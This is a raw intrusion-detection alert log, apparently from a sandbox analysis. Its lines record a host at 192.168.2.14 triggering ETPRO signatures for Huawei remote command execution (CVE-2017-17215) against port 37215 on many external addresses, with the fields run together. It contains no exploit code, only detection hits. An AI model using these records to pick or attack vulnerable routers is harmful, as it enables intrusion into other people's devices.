                                                    07/10/24-08:27:11.529437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475637215192.168.2.1446.235.164.76
                                                    07/10/24-08:27:20.451550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598637215192.168.2.14197.235.102.243
                                                    07/10/24-08:26:13.830760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239037215192.168.2.14157.84.199.199
                                                    07/10/24-08:26:29.662574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920837215192.168.2.1446.33.82.155
                                                    07/10/24-08:27:22.926314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161037215192.168.2.1441.5.209.123
                                                    07/10/24-08:27:28.182611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.1441.133.214.251
                                                    07/10/24-08:26:14.786182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516437215192.168.2.14157.67.213.102
                                                    07/10/24-08:27:27.174460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127037215192.168.2.1417.26.134.8
                                                    07/10/24-08:27:22.896647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784637215192.168.2.14157.13.237.69
                                                    07/10/24-08:26:43.856706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782237215192.168.2.1441.19.61.9
                                                    07/10/24-08:26:55.471512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196637215192.168.2.1483.144.50.207
                                                    07/10/24-08:26:43.526771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516037215192.168.2.1441.103.215.120
                                                    07/10/24-08:27:20.437179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554037215192.168.2.1464.54.249.50
                                                    07/10/24-08:27:08.451424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291237215192.168.2.14197.24.20.194
                                                    07/10/24-08:27:11.532484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398437215192.168.2.14197.250.109.90
                                                    07/10/24-08:26:57.668883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772237215192.168.2.14157.94.7.80
                                                    07/10/24-08:26:14.824787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.14197.251.59.186
                                                    07/10/24-08:27:14.803145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262437215192.168.2.14197.150.33.248
                                                    07/10/24-08:26:20.173091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027837215192.168.2.14157.145.139.199
                                                    07/10/24-08:27:10.609606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864837215192.168.2.14157.56.226.148
                                                    07/10/24-08:27:30.561465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754037215192.168.2.14223.194.50.187
                                                    07/10/24-08:27:14.867068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5672237215192.168.2.1465.225.97.198
                                                    07/10/24-08:27:13.960934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627837215192.168.2.14157.185.104.135
                                                    07/10/24-08:26:41.467844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281637215192.168.2.14157.81.81.36
                                                    07/10/24-08:27:05.164173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916237215192.168.2.1439.86.211.24
                                                    07/10/24-08:26:18.020441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005637215192.168.2.14161.87.230.231
                                                    07/10/24-08:26:43.559521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181237215192.168.2.14157.255.61.38
                                                    07/10/24-08:26:42.400738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954637215192.168.2.14197.251.176.133
                                                    07/10/24-08:27:28.121726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867437215192.168.2.1441.24.132.124
                                                    07/10/24-08:26:42.432411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991437215192.168.2.14157.32.112.4
                                                    07/10/24-08:26:13.776398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814237215192.168.2.1441.120.237.207
                                                    07/10/24-08:26:17.985127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966837215192.168.2.1483.170.36.118
                                                    07/10/24-08:26:49.850871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805837215192.168.2.1441.159.81.5
                                                    07/10/24-08:27:27.128635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541037215192.168.2.1441.111.179.53
                                                    07/10/24-08:26:38.611968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.1441.90.203.149
                                                    07/10/24-08:26:55.360027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216837215192.168.2.14197.235.70.240
                                                    07/10/24-08:26:15.865384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170437215192.168.2.14197.136.237.200
                                                    07/10/24-08:26:26.564107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027837215192.168.2.14197.163.90.119
                                                    07/10/24-08:27:27.169986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207637215192.168.2.1441.6.114.98
                                                    07/10/24-08:27:32.532227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525037215192.168.2.14157.95.172.155
                                                    07/10/24-08:27:20.460856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381237215192.168.2.1441.219.117.148
                                                    07/10/24-08:27:05.167666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918437215192.168.2.144.109.59.121
                                                    07/10/24-08:26:42.168081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.14157.136.201.167
                                                    07/10/24-08:26:29.837168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067037215192.168.2.1441.63.240.16
                                                    07/10/24-08:26:22.276470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644037215192.168.2.14197.22.238.205
                                                    07/10/24-08:26:36.437126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857237215192.168.2.14197.200.197.130
                                                    07/10/24-08:26:17.941033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590437215192.168.2.14157.82.105.251
                                                    07/10/24-08:26:59.686618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397237215192.168.2.14106.73.60.74
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975437215192.168.2.1441.121.4.136
                                                    07/10/24-08:27:20.509281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051637215192.168.2.14157.16.215.1
                                                    07/10/24-08:26:26.441172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174437215192.168.2.14197.151.194.228
                                                    07/10/24-08:26:31.069950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3385037215192.168.2.1441.191.148.156
                                                    07/10/24-08:27:05.207255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065637215192.168.2.1441.190.27.30
                                                    07/10/24-08:27:14.841554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433037215192.168.2.14142.29.169.35
                                                    07/10/24-08:26:29.877616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682237215192.168.2.14197.250.245.112
                                                    07/10/24-08:26:55.376308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216237215192.168.2.14157.17.39.130
                                                    07/10/24-08:27:24.999763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424037215192.168.2.1441.129.62.170
                                                    07/10/24-08:27:11.529436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567237215192.168.2.14197.156.236.163
                                                    07/10/24-08:26:20.147730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328237215192.168.2.14157.195.194.215
                                                    07/10/24-08:26:47.949660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909437215192.168.2.14157.42.104.97
                                                    07/10/24-08:26:49.808477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298237215192.168.2.14157.2.122.153
                                                    07/10/24-08:27:22.564607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304037215192.168.2.1441.0.192.217
                                                    07/10/24-08:27:08.373300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556637215192.168.2.1441.43.54.138
                                                    07/10/24-08:27:36.283818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671437215192.168.2.14159.120.3.20
                                                    07/10/24-08:26:45.607530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634837215192.168.2.1441.35.242.255
                                                    07/10/24-08:26:47.986495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360037215192.168.2.1441.21.244.187
                                                    07/10/24-08:26:28.912648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836437215192.168.2.1441.238.34.117
                                                    07/10/24-08:27:14.846444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319237215192.168.2.14197.147.157.111
                                                    07/10/24-08:27:05.072546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730237215192.168.2.1441.154.23.228
                                                    07/10/24-08:26:15.831924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765437215192.168.2.1475.232.208.247
                                                    07/10/24-08:26:18.019292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607637215192.168.2.14157.147.46.115
                                                    07/10/24-08:26:59.603648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392437215192.168.2.1441.62.228.111
                                                    07/10/24-08:27:30.545208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354037215192.168.2.1441.193.194.19
                                                    07/10/24-08:26:45.659206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643437215192.168.2.14157.225.114.65
                                                    07/10/24-08:27:28.177795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032637215192.168.2.14197.81.119.218
                                                    07/10/24-08:26:41.568128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520037215192.168.2.1441.89.19.62
                                                    07/10/24-08:27:19.264327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378437215192.168.2.14206.141.231.87
                                                    07/10/24-08:26:22.260585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5898637215192.168.2.14197.180.141.171
                                                    07/10/24-08:26:36.357505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5444637215192.168.2.1441.124.206.56
                                                    07/10/24-08:26:11.594883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721437215192.168.2.1498.112.11.193
                                                    07/10/24-08:26:59.640605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678837215192.168.2.1441.144.159.68
                                                    07/10/24-08:26:28.917896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841037215192.168.2.14197.170.252.202
                                                    07/10/24-08:27:23.956739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109037215192.168.2.14157.84.164.212
                                                    07/10/24-08:26:28.641864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772437215192.168.2.1419.168.204.201
                                                    07/10/24-08:27:14.846444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201037215192.168.2.14197.241.178.137
                                                    07/10/24-08:26:59.580773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602437215192.168.2.14197.168.76.22
                                                    07/10/24-08:27:14.861604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160037215192.168.2.14157.77.110.157
                                                    07/10/24-08:27:17.008672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611437215192.168.2.14157.30.184.230
                                                    07/10/24-08:26:36.383981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029037215192.168.2.1441.67.174.169
                                                    07/10/24-08:26:13.798574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257837215192.168.2.14131.76.42.65
                                                    07/10/24-08:27:28.151142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.1441.206.98.157
                                                    07/10/24-08:27:32.549602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14157.191.234.129
                                                    07/10/24-08:26:26.531286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567237215192.168.2.1420.224.37.228
                                                    07/10/24-08:26:41.283034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14200.102.212.73
                                                    07/10/24-08:26:23.305331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952637215192.168.2.14111.129.101.161
                                                    07/10/24-08:26:43.752339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773437215192.168.2.14197.233.204.4
                                                    07/10/24-08:27:24.867570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430237215192.168.2.1441.69.157.51
                                                    07/10/24-08:27:23.786219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310037215192.168.2.14216.155.138.124
                                                    07/10/24-08:27:28.156575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160437215192.168.2.14197.107.92.74
                                                    07/10/24-08:27:14.026177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036237215192.168.2.14197.235.116.148
                                                    07/10/24-08:27:19.277665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286637215192.168.2.14157.151.81.174
                                                    07/10/24-08:27:08.458105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860637215192.168.2.14197.3.158.1
                                                    07/10/24-08:27:13.921196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086637215192.168.2.14197.74.164.68
                                                    07/10/24-08:26:53.124303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579237215192.168.2.14197.71.159.17
                                                    07/10/24-08:26:59.757795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065837215192.168.2.14197.22.204.61
                                                    07/10/24-08:26:20.128612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.1441.227.100.130
                                                    07/10/24-08:26:43.925849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040037215192.168.2.14173.18.132.53
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648037215192.168.2.14197.70.229.92
                                                    07/10/24-08:27:05.220771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883437215192.168.2.14129.47.5.97
                                                    07/10/24-08:27:22.562470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945637215192.168.2.14197.38.254.210
                                                    07/10/24-08:26:43.656959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143637215192.168.2.1441.225.152.150
                                                    07/10/24-08:26:31.083283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045837215192.168.2.14180.139.78.143
                                                    07/10/24-08:26:57.655125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5002037215192.168.2.1441.134.198.201
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322837215192.168.2.1496.142.145.152
                                                    07/10/24-08:26:28.926953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037637215192.168.2.14157.214.103.78
                                                    07/10/24-08:26:59.781725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855037215192.168.2.14157.90.178.164
                                                    07/10/24-08:26:25.499192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184637215192.168.2.1441.210.74.25
                                                    07/10/24-08:27:02.702209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.1441.64.224.30
                                                    07/10/24-08:27:20.488786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647637215192.168.2.14197.193.104.160
                                                    07/10/24-08:27:30.499303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401637215192.168.2.1424.107.242.142
                                                    07/10/24-08:27:17.055063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4031437215192.168.2.14171.103.187.3
                                                    07/10/24-08:27:27.153335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692837215192.168.2.14197.138.149.206
                                                    07/10/24-08:26:59.844972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344637215192.168.2.1441.250.156.182
                                                    07/10/24-08:26:43.878190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315837215192.168.2.14197.176.243.98
                                                    07/10/24-08:26:11.664680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463837215192.168.2.1441.181.29.82
                                                    07/10/24-08:27:20.514336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5176637215192.168.2.14218.185.108.209
                                                    07/10/24-08:26:13.828351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14197.130.93.226
                                                    07/10/24-08:26:53.198978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754037215192.168.2.14197.84.250.61
                                                    07/10/24-08:26:57.645172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948437215192.168.2.1441.201.127.19
                                                    07/10/24-08:26:59.589952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940637215192.168.2.14114.218.213.10
                                                    07/10/24-08:27:33.854210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468237215192.168.2.14157.226.153.34
                                                    07/10/24-08:26:43.772841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719037215192.168.2.14197.184.237.105
                                                    07/10/24-08:26:38.627693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675837215192.168.2.14117.120.74.62
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711837215192.168.2.14139.243.161.70
                                                    07/10/24-08:26:57.650835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692237215192.168.2.14198.26.128.44
                                                    07/10/24-08:26:29.871003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.14175.148.96.207
                                                    07/10/24-08:26:55.350544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772037215192.168.2.14157.28.178.44
                                                    07/10/24-08:26:51.966611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216037215192.168.2.1441.27.189.166
                                                    07/10/24-08:27:20.478672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609637215192.168.2.1441.182.166.185
                                                    07/10/24-08:26:42.413820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120637215192.168.2.14157.134.102.159
                                                    07/10/24-08:27:08.350346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931037215192.168.2.1441.24.54.9
                                                    07/10/24-08:26:57.654804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597037215192.168.2.14218.132.74.249
                                                    07/10/24-08:26:11.576586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696437215192.168.2.14197.230.47.191
                                                    07/10/24-08:26:25.468453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713237215192.168.2.14151.123.199.16
                                                    07/10/24-08:26:59.852225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062637215192.168.2.1441.120.103.74
                                                    07/10/24-08:26:59.839677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307837215192.168.2.1441.201.11.164
                                                    07/10/24-08:26:11.554778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972037215192.168.2.14135.93.169.69
                                                    07/10/24-08:26:55.432680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.1441.87.33.135
                                                    07/10/24-08:27:19.215943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642837215192.168.2.14157.204.205.70
                                                    07/10/24-08:26:41.617966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686637215192.168.2.14197.23.22.195
                                                    07/10/24-08:27:28.169608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745037215192.168.2.14157.123.100.91
                                                    07/10/24-08:26:11.575874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690437215192.168.2.1441.228.20.71
                                                    07/10/24-08:27:02.736564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057637215192.168.2.14197.95.164.78
                                                    07/10/24-08:27:32.587854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941237215192.168.2.14138.16.159.168
                                                    07/10/24-08:26:45.619051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.1441.55.0.36
                                                    07/10/24-08:26:13.790493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212837215192.168.2.14157.160.107.146
                                                    07/10/24-08:26:36.425072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524437215192.168.2.1458.84.249.101
                                                    07/10/24-08:26:17.996643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921237215192.168.2.14157.31.93.223
                                                    07/10/24-08:26:20.145425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777037215192.168.2.1420.105.231.50
                                                    07/10/24-08:26:33.250485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932637215192.168.2.14197.232.63.23
                                                    07/10/24-08:26:43.667979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669637215192.168.2.14108.198.118.170
                                                    07/10/24-08:27:05.183998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329037215192.168.2.14197.242.212.37
                                                    07/10/24-08:26:42.352780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374837215192.168.2.14157.234.81.50
                                                    07/10/24-08:26:59.655988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475237215192.168.2.14197.188.43.190
                                                    07/10/24-08:26:38.586951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821837215192.168.2.14157.231.203.232
                                                    07/10/24-08:26:15.800332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814637215192.168.2.14197.217.114.94
                                                    07/10/24-08:27:05.141493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335037215192.168.2.14197.251.97.197
                                                    07/10/24-08:27:19.148298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434637215192.168.2.14197.41.160.138
                                                    07/10/24-08:26:11.664680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542237215192.168.2.1441.9.0.7
                                                    07/10/24-08:26:25.504243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501237215192.168.2.14197.77.126.20
                                                    07/10/24-08:26:59.851109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462437215192.168.2.1425.242.38.54
                                                    07/10/24-08:27:30.400468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.14157.158.188.95
                                                    07/10/24-08:26:36.343615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732637215192.168.2.1486.198.150.199
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553037215192.168.2.14176.97.105.136
                                                    07/10/24-08:26:43.766765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875637215192.168.2.14194.106.5.52
                                                    07/10/24-08:27:08.425890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665637215192.168.2.1441.54.101.2
                                                    07/10/24-08:27:17.053673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950637215192.168.2.14197.255.3.138
                                                    07/10/24-08:26:26.591213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815637215192.168.2.14157.141.252.134
                                                    07/10/24-08:27:11.496514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581037215192.168.2.14197.78.45.100
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003237215192.168.2.14222.35.43.106
                                                    07/10/24-08:26:38.536872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678037215192.168.2.14197.252.28.52
                                                    07/10/24-08:26:25.489238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616437215192.168.2.14177.55.234.15
                                                    07/10/24-08:26:28.938388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678837215192.168.2.14197.58.208.235
                                                    07/10/24-08:26:17.939708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305637215192.168.2.1483.128.57.10
                                                    07/10/24-08:27:16.985380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857237215192.168.2.14200.165.157.51
                                                    07/10/24-08:26:13.831960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249837215192.168.2.14157.75.247.179
